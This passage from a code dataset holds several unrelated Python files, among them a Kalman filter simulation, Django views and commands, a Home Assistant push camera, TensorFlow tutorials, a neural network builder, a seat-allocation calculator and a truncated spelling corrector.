= F23*F23*TS*TS*TS/3.0\n\t\tq_23 = F23*TS*TS/2.0\n\t\tq_32 = q_23\n\t\tQ = np.matrix([[0, 0, 0],[0, q_22, q_23],[0, q_32, TS]])\n\t\t\t\n\t\tM=PHI*P*PHI.transpose()+PHIS*Q\n\t\tK = M*HMAT.transpose()*(inv(HMAT*M*HMAT.transpose() + R))\n\t\tP=(I-K*HMAT)*M\t\n\t\tXNOISE = GAUSS_PY(SIGMA_NOISE)\n\t\t\n\t\tif (rk == 1):\n\t\t\t# Use integration Runge-Kutta to propagate XH and XDH\n\t\t\tT_ = 0\n\t\t\twhile (T_< TS):\n\t\t\t\tk11 = dt*f1(XH,XDH,T_)\n\t\t\t\tk21 = dt*f2(XH,XDH,T_)\n\t\t\t\tk12 = dt*f1(XH+0.5*k11,XDH+0.5*k21,T_+0.5*dt)\n\t\t\t\tk22 = dt*f2(XH+0.5*k11,XDH+0.5*k21,T_+0.5*dt)\n\t\t\t\tk13 = dt*f1(XH+0.5*k12,XDH+0.5*k22,T_+0.5*dt)\n\t\t\t\tk23 = dt*f2(XH+0.5*k12,XDH+0.5*k22,T_+0.5*dt)\n\t\t\t\tk14 = dt*f1(XH+k13,XDH+k23,T_+dt)\n\t\t\t\tk24 = dt*f2(XH+k13,XDH+k23,T_+dt)\n\t\t\t\tXH = XH + (k11+2*k12+2*k13+k14)/6\n\t\t\t\tXDH = XDH + (k21+2*k22+2*k23+k24)/6\n\t\t\t\tXDB = XDH\n\t\t\t\tXB = XH\n\t\t\t\tT_ = T_+dt\n\t\telif (rk == 2):\n\t\t\t# Use Euler integration to propagate XH and XDH\t\n\t\t\tXDB= XDH+TS*f2(XH,XDH,T)\n\t\t\tXB = XH+TS*XDB\n\t\telse:\n\t\t\tHP = 0.001\n\t\t\t[XB, XDB] = PROJECT(TS,XH,XDH,BETAH,HP)\n\t\t\t \n\t\t\t\n\t\tXS = X1+XNOISE\n\t\tRES= XS-XB\n\t\tXH=XB+K[0,0]*RES\n\t\tk1.append(K[0,0])\n\t\tXDH=XDB+K[1,0]*RES\n\t\tk2.append(K[1,0])\n\t\tBETAH = BETAH +K[2,0]*RES\n\t\tERRX1=X1-XH\n\t\tSP11=math.sqrt(P[0,0])\n\t\tSP11N = -SP11\n\t\tERRX1D=X1D-XDH\n\t\tSP22=math.sqrt(P[1,1])\n\t\tSP22N = -SP22\n\t\tERRBETA=BETA-BETAH\n\t\t'''\n\t\thangoff error are error does not go to zero.\n\t\t'''\n\t\tSP33=math.sqrt(P[2,2])\n\t\tSP33N = -SP33\n\t\tt.append(T)\n\t\tx1.append(X1)\n\t\txs.append(XS)\n\t\tres.append(RES)\n\t\tx1_hat.append(XH)\n\t\tx1dot.append(X1D)\n\t\tx1dot_hat.append(XDH)\n\t\tx1_hat_ERR.append(ERRX1)\n\t\tsp11.append(SP11)\n\t\tsp11n.append(SP11N)\n\t\tx1dot_hat_ERR.append(ERRX1D)\n\t\tsp22.append(SP22)\n\t\tsp22n.append(SP22N)\n\t\tbeta_hat_ERR.append(ERRBETA)\n\t\tsp33.append(SP33)\n\t\tsp33n.append(SP33N)\n\t\t\n'''\nAdding process noise increases errors in estimate of altitude\nbut reduces the hangoff error \n'''\n\nplt.figure(1)\nplt.grid(True)\nplt.plot(t,x1_hat_ERR,label='x-hat', linewidth=0.6)\nplt.plot(t,sp11,label='sp11', linewidth=0.6)\nplt.plot(t,sp11n,label='sp11n', linewidth=0.6)\nplt.xlabel('Time (Sec)')\nplt.ylabel('Estimate and True Signal')\nplt.xlim(0,30)\nplt.legend()\nplt.ylim(-50,50)\n\nplt.figure(2)\nplt.grid(True)\nplt.plot(t,x1dot_hat_ERR,label='xd-hat', linewidth=0.6)\nplt.plot(t,sp22,label='sp22', linewidth=0.6)\nplt.plot(t,sp22n,label='sp22n', linewidth=0.6)\nplt.xlabel('Time (Sec)')\nplt.ylabel('Estimate and True Signal')\nplt.xlim(0,30)\nplt.legend()\nplt.ylim(-200,200)\n\nplt.figure(3)\nplt.grid(True)\nplt.plot(t,beta_hat_ERR,label='beta-hat', linewidth=0.6)\nplt.plot(t,sp33,label='sp33', linewidth=0.6)\nplt.plot(t,sp33n,label='sp33n', linewidth=0.6)\nplt.xlabel('Time (Sec)')\nplt.ylabel('Estimate and True Signal')\nplt.xlim(0,30)\nplt.legend()\nplt.ylim(-400,400)\nplt.show()\n","sub_path":"chapter8/listing_8_1.py","file_name":"listing_8_1.py","file_ext":"py","file_size_in_byte":5888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"250611024","text":"from django.core.management.base import BaseCommand\n\nfrom salt_observer.models import Minion\nfrom . import ApiCommand\n\nimport json\n\n\nclass Command(ApiCommand, BaseCommand):\n help = 'Fetch and save packagedata'\n\n def save_packages(self, api):\n packages = api.get('pkg.list_pkgs')\n upgrades = api.get('pkg.list_upgrades')\n\n for minion_fqdn, minion_packages in packages.items():\n\n minion = Minion.objects.filter(fqdn=minion_fqdn).first()\n\n minion_package_data = {}\n for minion_package_name, minion_package_version in minion_packages.items():\n if type(upgrades.get(minion_fqdn, {})) != dict:\n del upgrades[minion_fqdn]\n\n minion_package_data.update({\n minion_package_name: {\n 'version': minion_package_version,\n 'latest_version': upgrades.get(minion_fqdn, {}).get(minion_package_name, '')\n }\n })\n\n minion.update_data({'packages': minion_package_data})\n minion.save()\n\n def handle(self, *args, **kwargs):\n api = super().handle(*args, **kwargs)\n self.save_packages(api)\n api.logout()\n","sub_path":"salt_observer/management/commands/fetchpackages.py","file_name":"fetchpackages.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"173337098","text":"#!/usr/bin/env python\n\n\"\"\"\n3. NAPALM using nxos_ssh has the following data structure in one of its unit tests (the below data is in JSON format). \n\n{\n \"Ethernet2/1\": {\n \"ipv4\": {\n \"1.1.1.1\": {\n \"prefix_length\": 24\n }\n }\n },\n \"Ethernet2/2\": {\n \"ipv4\": {\n \"2.2.2.2\": {\n \"prefix_length\": 27\n }, \n \"3.3.3.3\": {\n \"prefix_length\": 25\n }\n }\n }, \n \"Ethernet2/3\": {\n \"ipv4\": {\n \"4.4.4.4\": {\n \"prefix_length\": 16\n }\n }, \n \"ipv6\": {\n \"fe80::2ec2:60ff:fe4f:feb2\": {\n \"prefix_length\": 64\n }, \n \"2001:db8::1\": {\n \"prefix_length\": 10\n }\n }\n }, \n \"Ethernet2/4\": {\n \"ipv6\": {\n \"fe80::2ec2:60ff:fe4f:feb2\": {\n \"prefix_length\": 64\n }, \n \"2001:11:2233::a1\": {\n \"prefix_length\": 24\n }, \n \"2001:cc11:22bb:0:2ec2:60ff:fe4f:feb2\": {\n \"prefix_length\": 64\n }\n }\n } \n}\n\nRead this JSON data in from a file.\n\nFrom this data structure extract all of the IPv4 and IPv6 addresses that are used on this NXOS device. \nFrom this data create two lists: 'ipv4_list' and 'ipv6_list'. \nThe 'ipv4_list' should be a list of all of the IPv4 addresses including prefixes; \nthe 'ipv6_list' should be a list of all of the IPv6 addresses including prefixes.\n\"\"\"\n\nimport json\nfrom pprint import pprint\n\nwith open(\"nxos_intf.json\") as f:\n data = json.load(f)\n\nipv4_list = list()\nipv6_list = list()\n\nfor a, b in data.items():\n for c, d in b.items():\n if c == \"ipv4\":\n for e, f in d.items():\n ipv4 = e\n prefix = f[\"prefix_length\"]\n ipv4_addr = ipv4 + \"/\" + str(prefix)\n ipv4_list.append(ipv4_addr)\n if c == \"ipv6\":\n for e, f in d.items():\n ipv6 = e\n prefix = f[\"prefix_length\"]\n ipv6_addr = ipv6 + \"/\" + str(prefix)\n ipv6_list.append(ipv6_addr)\n\nprint(json.dumps(ipv4_list, indent=4))\nprint(json.dumps(ipv6_list, indent=4))\n \n","sub_path":"class3/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"538511869","text":"\"\"\"\nCamera platform that receives images through HTTP POST.\n\nFor more details about this platform, please refer to the documentation\nhttps://home-assistant.io/components/camera.http_push/\n\"\"\"\nimport logging\n\nimport voluptuous as vol\n\nfrom homeassistant.components.camera import Camera, PLATFORM_SCHEMA\nfrom homeassistant.components.http.view import HomeAssistantView\nfrom homeassistant.const import CONF_NAME, HTTP_BAD_REQUEST\nfrom homeassistant.helpers import config_validation as cv\n\n_LOGGER = logging.getLogger(__name__)\n\nAPI_URL = \"/api/camera_http_push/{entity_id}\"\n\nDEFAULT_NAME = 'HTTP Push Camera'\n\nBLANK_IMAGE_SIZE = (320, 240)\n\nREQUIREMENTS = ['pillow==5.0.0']\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({\n vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string\n})\n\n\nasync def async_setup_platform(hass, config, async_add_devices,\n discovery_info=None):\n \"\"\"Set up the HTTP Push camera platform.\"\"\"\n cameras = [HttpPushCamera(config.get(CONF_NAME))]\n\n hass.http.register_view(CameraPushReceiver(cameras))\n\n async_add_devices(cameras)\n\n\nclass CameraPushReceiver(HomeAssistantView):\n \"\"\"Handle pushes from remote camera.\"\"\"\n\n url = API_URL\n name = 'api:camera:http_push'\n\n def __init__(self, cameras):\n \"\"\"Initialize CameraPushReceiver with camera entity.\"\"\"\n self._cameras = cameras\n\n async def post(self, request, entity_id):\n \"\"\"Accept the POST from Camera.\"\"\"\n try:\n (_camera,) = [camera for camera in self._cameras\n if camera.entity_id == entity_id]\n except ValueError:\n return self.json_message('Unknown HTTP Push Camera',\n HTTP_BAD_REQUEST)\n\n try:\n data = await request.post()\n _LOGGER.debug(\"Received Camera push: %s\", data['image'])\n _camera.update_image(data['image'].file.read())\n except ValueError:\n return self.json_message('Invalid POST', HTTP_BAD_REQUEST)\n\n\nclass HttpPushCamera(Camera):\n \"\"\"The representation of a HTTP Push camera.\"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize http push camera component.\"\"\"\n super().__init__()\n self._name = name\n self._motion_status = False\n\n from PIL import Image\n import io\n\n image = Image.new('RGB', BLANK_IMAGE_SIZE)\n\n imgbuf = io.BytesIO()\n image.save(imgbuf, \"JPEG\")\n\n self._current_image = imgbuf.getvalue()\n\n def update_image(self, image):\n \"\"\"Update the camera image.\"\"\"\n self._current_image = image\n self.schedule_update_ha_state()\n\n def camera_image(self):\n \"\"\"Return a still image response.\"\"\"\n return self._current_image\n\n async def async_camera_image(self):\n \"\"\"Return a still image response.\"\"\"\n return self.camera_image()\n\n @property\n def name(self):\n \"\"\"Return the name of this camera.\"\"\"\n return self._name\n\n @property\n def motion_detection_enabled(self):\n \"\"\"Camera Motion Detection Status.\"\"\"\n return self._motion_status\n","sub_path":"camera/http_push.py","file_name":"http_push.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"153618105","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 2 18:30:03 2021\n\n@author: anusk\n\"\"\"\n\nimport cv2\nimport numpy as np\nimport scipy.interpolate as spi\nfrom matplotlib import pyplot as plt\n\ndef PhaseCorrelation(anchorFrame, targetFrame):\n \n anchorFrame =np.double(anchorFrame)\n targetFrame =np.double(targetFrame)\n frame = np.dstack((anchorFrame, targetFrame))\n \n dimy = anchorFrame.shape[0]\n dimx = anchorFrame.shape[1]\n \n blockx = 16\n blocky = 16\n \n matchy=np.zeros([int(dimy/blocky),int(dimx/blockx)], np.double)\n matchx=np.zeros([int(dimy/blocky),int(dimx/blockx)], np.double)\n halfy=np.zeros([int(dimy/blocky),int(dimx/blockx)], np.double)\n halfx=np.zeros([int(dimy/blocky),int(dimx/blockx)], np.double)\n \n #window de fft\n T = 32\n winv=np.arange(32)\n alpha=0\n a =(winv-(T/2))/T\n b = np.cos(alpha*np.pi*((winv-(T/2))/T))\n c = 1-np.square(2*alpha*(winv-(T/2))/T)\n window= np.array([np.sinc(a*b/c)])\n windowT = window.T\n windowT.T\n window = windowT @ window\n \n for loopi in range(2,int(dimy/blocky)):\n \n for loopj in range(2,int(dimx/blockx)):\n ybound1 = (loopi-1)*blocky\n ybound2 = loopi*blocky\n xbound1 = (loopj-1)*blockx\n xbound2 = loopj*blockx\n \n #divide frame into blocks\n previous = anchorFrame[ybound1-8:ybound2+8, xbound1-8:xbound2+8]\n block = targetFrame[ybound1-8:ybound2+8, xbound1-8:xbound2+8]\n B_prev = np.fft.fft2(previous,[blocky*2,blockx*2])\n B_curr = np.fft.fft2(block*window,[blocky*2,blockx*2])\n mul = B_curr*np.conj(B_prev)\n mag = np.abs(mul)\n mag[mag==0] = 1e-31\n C = mul/mag\n c=np.fft.fftshift(np.abs(np.fft.ifft2(C)))\n [tempy,tempx] = np.where(c==c.max())\n matchy[loopi-1,loopj-1]=tempy[0]-blocky\n matchx[loopi-1,loopj-1]=tempx[0]-blockx\n \n if tempy[0]>=1 and tempy[0]+1<=31:\n tt = np.arange(-1,2)\n ppy = np.array([c[tempy[0]-1,tempx[0]],\n c[tempy[0],tempx[0]],\n c[tempy[0]+1,tempx[0]]])\n ii=np.arange(-1,1.5,0.5)\n iiy= spi.interp1d(tt,ppy,kind=\"quadratic\", fill_value=\"extrapolate\")(ii)\n if iiy[1]>c[tempy[0],tempx[0]]:\n halfy[loopi-1,loopj-1]=-1\n elif iiy[3]>c[tempy[0],tempx[0]]:\n halfy[loopi-1,loopj-1]=-1\n \n if tempx[0]>=1 and tempx[0]+1<31:\n tt = np.arange(-1,2)\n ppx = np.array([c[tempy[0],tempx[0]-1],\n c[tempy[0],tempx[0]],\n c[tempy[0],tempx[0]+1]])\n ii=np.arange(-1,1.5,0.5)\n iix= spi.interp1d(tt,ppx,kind=\"quadratic\", fill_value=\"extrapolate\")(ii)\n if iix[1]>c[tempy[0],tempx[0]]:\n halfx[loopi-1,loopj-1]=-1\n elif iix[3]>c[tempy[0],tempx[0]]:\n halfx[loopi-1,loopj-1]=-1\n \n fig,ax = plt.subplots()\n ax.quiver(matchx,matchy) \n plt.show() \n \n #MC prediction\n predict = np.zeros([dimy,dimx], np.double) \n \n for loopi in range(1, int(dimy/blocky)+1):\n for loopj in range(1, int(dimx/blockx)+1):\n ybound1 = (loopi-1)*blocky\n ybound2 = loopi*blocky\n xbound1 = (loopj-1)*blockx\n xbound2 = loopj*blockx\n \n offy = -matchy[loopi-1,loopj-1]\n offx = -matchx[loopi-1,loopj-1]\n \n pred = anchorFrame[abs(int(ybound1+offy)):abs(int(ybound2+offy)), abs(int(xbound1+offx)):abs(int(xbound2+offx))]\n \n if halfy[loopi-1,loopj-1] == 1:\n average = anchorFrame[abs(int(ybound1+offy))-1:abs(int(ybound2+offy))-1,\n abs(int(xbound1+offx)):abs(int(xbound2+offx))]\n pred = 0.5*(pred+average)\n elif halfy[loopi-1,loopj-1] ==-1:\n average = anchorFrame[abs(int(ybound1+offy))+1:abs(int(ybound2+offy))+1,\n abs(int(xbound1+offx)):abs(int(xbound2+offx))]\n pred = 0.5*(pred+average)\n \n predict[ybound1:ybound2,xbound1:xbound2] = pred\n \n plt.figure()\n plt.imshow(predict,cmap='gray')\n plt.show()\n \n matchyy= matchy +0.5*halfy\n matchxx = matchx +0.5*halfx\n \n dy = matchyy[1:int(dimy/blocky)-1, 1:int(dimx/blockx)-1]\n dx = matchxx[1:int(dimy/blocky)-1, 1:int(dimx/blockx)-1]\n\n rangey = np.arange(np.min(dy), np.max(dy)+0.5,.05)\n \n print(rangey.dtype)\n\nif __name__ == \"__main__\":\n \n anchorframe = cv2.imread('foremanY69.png',0)\n targetframe = cv2.imread('foremanY72.png',0)\n PhaseCorrelation(anchorframe, targetframe)\n ","sub_path":"PracticasTDI/P8/motionstimation/PhaseCorrelation.py","file_name":"PhaseCorrelation.py","file_ext":"py","file_size_in_byte":4951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"622063075","text":"from django.shortcuts import render,redirect\nfrom app01 import models\n#图书管理系统\n\n#图书列表\ndef book_list(request):\n #从数据库中查询所有图书信息\n book_list=models.Book.objects.all()\n #将图书信息返回到html页面上\n return render(request,\"book_list.html\",{\"book_list\":book_list})\n\n\n#添加图书\ndef add_book(request):\n #get请求得到所有出版社名称\n if request.method==\"GET\":\n publisher_list=models.Publisher.objects.all()\n return render(request,\"add_book.html\",{'publisher_list':publisher_list})\n else:\n #post请求得到新添加的图书名称和选择的出版社的ID\n new_bname=request.POST.get(\"bname\")\n new_publisher_id=request.POST.get(\"publisher\")\n #去数据库中创建新添加的图书\n models.Book.objects.create(bname=new_bname,publisher_id=new_publisher_id)\n #返回到图书列表页面\n return redirect(\"/book_list/\")\n\n\n#删除图书\ndef delete_book(request):\n #得到要删除书籍的id\n del_id=request.GET.get(\"bid\")\n print(del_id)\n print(\"=\"*100)\n #得到要删除书籍对象,并执行删除操作\n models.Book.objects.get(bid=del_id).delete()\n return redirect(\"/book_list/\")\n\n\n#编辑图书\ndef edit_book(request):\n if request.method==\"GET\":\n #得到所有的出版社\n publisher_list=models.Publisher.objects.all()\n #要编辑图书id\n edit_id=request.GET.get(\"bid\")\n #得到要编辑图书对象(这里的bid是数据库中图书编号的属性)\n edit_book=models.Book.objects.get(bid=edit_id)\n return render(\n request,\n \"edit_book.html\",\n {\"publisher_list\":publisher_list,\"book\":edit_book}\n )\n else:\n #得到要编辑书的编号\n new_edit_id=request.POST.get(\"id\")\n # 得到要编辑的图书对象\n edit_book = models.Book.objects.get(bid=new_edit_id)\n #得到要编辑书的名称(即修改后的书名)\n new_edit_name=request.POST.get(\"name\")\n #得到要编辑出版社id\n new_edit_pid=request.POST.get(\"publisher\")\n #更新图书名称和出版社编号\n edit_book.bname=new_edit_name\n edit_book.publisher_id=new_edit_pid\n #保存\n edit_book.save()\n #返回修改后的图书页面\n return redirect(\"/book_list/\")\n\n\n\n\n\n\n","sub_path":"app01/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"439130428","text":"import turtle\n\nturtle.shape('turtle')\n#Нарисуйте 10 вложенных квадратов.\nfor j in range(10):\n turtle.penup()\n turtle.goto(j*10,j*10)\n turtle.pendown()\n for i in range(4):\n turtle.right(90)\n turtle.forward(50+j*20)\n","sub_path":"pract-1/ex-4.py","file_name":"ex-4.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"476350160","text":"def func():\n # 'value' создается как локальный идентификатор\n value = 100\n\ndef func_with_global():\n global value\n # global указывает, что нужно использовать 'value'\n # из глобальной области видимости\n value = 100\n\nvalue = 0\nfunc()\nprint(value) # 0\n\nfunc_with_global()\nprint(value) # 100\n","sub_path":"yuripetrov.pythonanywhere.com/_downloads/05_01_08.py","file_name":"05_01_08.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"644614501","text":"# =============================================================================\n# first steps with neural nets\n# =============================================================================\n\n# these examples are from Raschka and Mirjalili (2018): Machine Learning \n# mit Python und Scikit-learn und TensorFlow, chapter 13\n\n# install the tensorflow library\n# remember use selected enviroment\nimport tensorflow as tf\n\n# =============================================================================\n# first example of a model with tensorflow\n# =============================================================================\n\n# we initialize the graph\ng = tf.Graph()\n\n# we define the parameters and the function\nwith g.as_default():\n x = tf.placeholder(dtype = tf.float32,\n shape =(None), name = \"x\")\n w = tf.Variable(2.0, name = \"weight\")\n b = tf.Variable(0.7, name = \"bias\")\n z = w * x + b\n init = tf.global_variables_initializer()\n \n# we apply the function to certain values \nwith tf.Session(graph = g) as sess:\n sess.run(init)\n for t in [1, 0.6, -1.8]:\n print(\"x = %4.1f --> z = %4.1f\"%(t, sess.run(z, feed_dict = {x : t})))\n\n# differencee to the above is in the dictionary \n# this structure allows faster computation \nwith tf.Session(graph = g) as sess:\n sess.run(init)\n print(sess.run(z, feed_dict = {x : [1., 0.6, -1.8]}))\n\n\n\n# =============================================================================\n# use tensorflow with arrays \n# =============================================================================\n\n# import the required packages\nimport tensorflow as tf\nimport numpy as np\n\n# we initialize the graph\ng = tf.Graph()\n\n# again we must define the required parameters and functions\nwith g.as_default():\n x = tf.placeholder(dtype = tf.float32,\n shape = (None, 2, 3),\n name = \"input_x\")\n # the placeholder \"-1\" stands for unknown input dimension\n # so generally all inputs can be reshaped by this function\n # after all \"reshape\", \"reduce_sum\" and \"reduce_mean\" are\n # tensorflow built in functions\n # as we see there are many more\n x2 = tf.reshape(x, shape = (-1, 6), name = \"x2\")\n xsum = tf.reduce_sum(x2, axis = 0, name = \"col_sum\")\n xmean = tf.reduce_mean(x2, axis = 0, name = \"col_mean\")\n xmax = tf.reduce_max(x2, axis = 0, name = \"col_max\")\n xmin = tf.reduce_min(x2, axis = 0, name = \"col_min\")\n\n# we call a session based on the defined parameters and functions as input\n# we define a input and evaluate it with the function\nwith tf.Session(graph = g) as sess:\n x_array = np.arange(18).reshape(3, 2, 3)\n print(\"input shape: \", x_array.shape)\n print(\"rearanged: \\n\", sess.run(x2, feed_dict = {x : x_array}))\n print(\"collumn sums: \\n\", sess.run(xsum, feed_dict = {x : x_array}))\n print(\"collumn means: \\n\", sess.run(xsum, feed_dict = {x : x_array}))\n print(\"collumn maximum: \\n\", sess.run(xmax, feed_dict = {x : x_array}))\n print(\"collumn minimum: \\n\", sess.run(xmin, feed_dict = {x : x_array}))\n\n\n\n\n\n","sub_path":"first_tf_script.py","file_name":"first_tf_script.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"274656036","text":"import os,sys,inspect\ncurrentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nparentdir = os.path.dirname(currentdir)\nsys.path.insert(0,parentdir) \n\n\nimport opencortex.build as oc\nimport opencortex.errorChecks as oc_check\n\n#### distribute cells for the sake of network visualization; no spatial dependence of connection probability at the moment \n\npopDict = {}\npopDict['L23PyrRS'] = [(1000, 'L23')]\npopDict['SupBasket'] = [(90, 'L23')]\npopDict['SupAxAx'] = [(90, 'L23')]\npopDict['L5TuftedPyrIB'] = [(800, 'L5')]\npopDict['L5TuftedPyrRS']=[(200,'L5')]\npopDict['L4SpinyStellate']=[(240,'L4')]\npopDict['L23PyrFRB']=[(50,'L23')]\npopDict['L6NonTuftedPyrRS']=[(500,'L6')]\npopDict['DeepAxAx']=[(100,'L6')]\npopDict['DeepBasket']=[(100,'L6')]\npopDict['DeepLTSInter']=[(100,'L6')]\npopDict['SupLTSInter']=[(90,'L23')]\npopDict['nRT']=[(100,'Thalamus')]\npopDict['TCR']=[(100,'Thalamus')]\n\n\nt1=-0\nt2=-250\nt3=-250\nt4=-200.0\nt5=-300.0\nt6=-300.0\nt7=-200.0\nt8=-200.0\n\nboundaries={}\n\nboundaries['L1']=[0,t1]\nboundaries['L23']=[t1,t1+t2+t3]\nboundaries['L4']=[t1+t2+t3,t1+t2+t3+t4]\nboundaries['L5']=[t1+t2+t3+t4,t1+t2+t3+t4+t5]\nboundaries['L6']=[t1+t2+t3+t4+t5,t1+t2+t3+t4+t5+t6]\nboundaries['Thalamus']=[t1+t2+t3+t4+t5+t6+t7,t1+t2+t3+t4+t5+t6+t7+t8]\n\nxs = [0,500]\nzs = [0,500] \n\nnml_doc, network = oc.generate_network(\"TestTraubBuildFull_winputs\")\n\n\nfor cellModel in popDict.keys():\n oc.add_cell_and_channels(nml_doc, '../NeuroML2/prototypes/Thalamocortical/%s.cell.nml'%cellModel,cellModel)\n\n\n\npopObjs=oc.add_populations_in_layers(network,boundaries,popDict,xs,zs)\n\n\n#extra_params=[{'pre':'L23PyrRS','post':'SupBasket','weights':[0.05],'delays':[5],'synComps':['NMDA']}]\n\ninput_params={'TCR':[ {'InputType':'GeneratePoissonTrains',\n 'InputTag':'PT',\n 'Layer':'Thalamus',\n 'TrainType':'persistent',\n 'Synapse':'Syn_AMPA_L6NT_TCR',\n 'AverageRate':0.05,\n 'LocationSpecific':True,\n 'FractionToTarget':1.0,\n 'TargetDict':{'dendrite_group':1000 } } ] }\n\noc_check.check_inputs(input_params,popDict)\n \nsynapseListInputs=oc.build_inputs(nml_doc,network,popObjs,input_params,\"../NeuroML2/prototypes/Thalamocortical/\")\nsys.exit(1)\n\nsynapseList,projArray=oc.build_connectivity(network,popObjs,\"Traub_conn_data.json\",\"../NeuroML2/prototypes/Thalamocortical/\") \n\nfor synapse in synapseListInputs:\n\n if synapse in synapseList:\n pass\n else:\n synapseList.append(synapse) \n\noc.add_synapses(nml_doc,'../NeuroML2/prototypes/Thalamocortical/',synapseList)\n\nnml_file_name = '%s.net.nml'%network.id\noc.save_network(nml_doc, nml_file_name, validate=True)\n\noc.generate_lems_simulation(nml_doc, \n network, \n nml_file_name, \n duration = 300, \n dt = 0.025)\n \n","sub_path":"examples/TestTraubBuildFull_winputs.py","file_name":"TestTraubBuildFull_winputs.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"213465337","text":"# ======== Proportional Representation Calculator ========\nimport math\n\nquota = {}\nvotes = {}\nwonSeats = {}\nseats = 0\nallocatedSeats = 0\n\n\ndef dhondt(winner):\n quota[winner] = math.floor(votes[winner] / (wonSeats[winner] + 1))\n\n\ndef altdhondt(winner):\n quota[winner] = votes[winner] / (wonSeats[winner] + 1)\n\n\ndef websterSainteLague(winner):\n quota[winner] = votes[winner] / ((2 * wonSeats[winner]) + 1)\n\n\ndef hareNiemeyer(winner, allVotes, seats):\n quota[winner] = (seats * votes[winner]) / allVotes\n\n\ndef main():\n print(\"==== PROPORTIONAL REPRESENTATION CALCULATOR ====\\n\")\n\n while True:\n try:\n print(\"\\nWhat method do you want to use?\\n(1) - D'Hondt\\n(2) - Alternative D'Hondt (Without Rounding)\\n(3) - \"\n \"Hare-Niemeyer\\n(4) - Sainte-Laguë/Webster\\n\")\n method = int(input(\"Enter either '1', '2', '3' or '4':\\n\"))\n\n if method in range(1, 5):\n break\n else:\n print(\"You have to enter either '1', '2', '3' or '4'!\")\n\n except ValueError:\n print(\"You have to enter either '1', '2', '3' or '4'!\")\n\n while True:\n try:\n seats = int(input(\"How many seats are up for election?\\n\"))\n break\n except ValueError:\n print(\"The amount of seats has to be a positive integer!\")\n\n while True:\n try:\n amountOfParties = int(input(\"How many parties participated in the election?\\n\"))\n break\n except ValueError:\n print(\"The amount of parties has to be a positive integer!\")\n\n allVotes = 0\n\n for x in range(amountOfParties):\n while True:\n try:\n party = str(input(\"Name of Party #\" + str(x + 1) + \": \"))\n if not party in quota:\n break\n else:\n print(\"The name of a party must be unique!\")\n \n except ValueError:\n print(\"The name of a party cannot be empty!\")\n\n while True:\n try:\n inputVotes = int(input(\"Amount of Votes for \" + party + \": \"))\n break\n\n except ValueError:\n print(\"The amount of votes of a party has to be a positive integer!\")\n\n allVotes = allVotes + inputVotes\n quota[party] = inputVotes\n votes[party] = inputVotes\n\n # This needs to be initialized as 1 for every party to give the right results If it starts at 0, the first\n # party to win a seat wins two because the quota will get updated after they've won their first seat\n wonSeats[party] = 1\n\n allocatedSeats = 0\n\n print(\"\\n==== CALCULATION ====\")\n while allocatedSeats < seats:\n winner = max(quota.values())\n winnerKeys = [key for (key, value) in quota.items() if value == winner]\n\n # If there's a tie between the quotas of at least 2 parties, the seat goes to the first party\n winnerKey = winnerKeys[0]\n\n # Result output\n print(str(winnerKey) + \" wins seat #\" + str(allocatedSeats + 1) + \" with the highest quota of \" + str(\n quota[winnerKey]))\n\n # Calculation based on method\n if method == 1:\n dhondt(winnerKey)\n\n if method == 2:\n altdhondt(winnerKey)\n\n if method == 3:\n hareNiemeyer(winnerKey, allVotes, seats)\n\n if method == 4:\n websterSainteLague(winnerKey)\n\n\n # Gives out warning if there's a tie between at least 2 quotas in the calculation\n if len(winnerKeys) > 1:\n print(\"WARNING! - There was a tie between \" + str(winnerKeys) + \". The seat went to the party that you \"\n \"entered first in the beginning.\")\n\n # Give seat to winner & calculate new quota\n wonSeats[winnerKey] = wonSeats[winnerKey] + 1\n allocatedSeats += 1\n\n print(\"\\n==== RESULTS ====\")\n for key in wonSeats:\n # See comment @ line 71: wonSeats - 1 because we started counting at 1\n print(\"Amount of seats for %s: %s\" % (key, (wonSeats[key] - 1)))\n\n # For windows users who use the python launcher\n x = input(\"\\nPress 'ENTER' to exit... \")\n if len(x) >= 0:\n quit()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"proportional-representation.py","file_name":"proportional-representation.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"564104556","text":"import re, collections\r\ndef words(text):\r\n return re.findall('[a-z]+', text.lower())#将文本中的单词分离开 返回一个列表\r\ndef train(features):\r\n model = collections.defaultdict(lambda: 1)\r\n for f in features:\r\n model[f] += 1\r\n return model\r\nNWORDS = train(words(open('dictionary.txt').read()))\r\nalphabet = 'abcdefghijklmnopqrstuvwxyz'\r\n\r\ndef edits1(word):\r\n splits = [(word[:i], word[i:]) for i in range(len(word) + 1)]\r\n deletes = [a + b[1:] for a, b in splits if b]\r\n transposes = [a + b[1] + b[0] + b[2:] for a, b in splits if len(b)>1]\r\n replaces = [a + c + b[1:] for a, b in splits for c in alphabet if b]\r\n inserts = [a + c + b for a, b in splits for c in 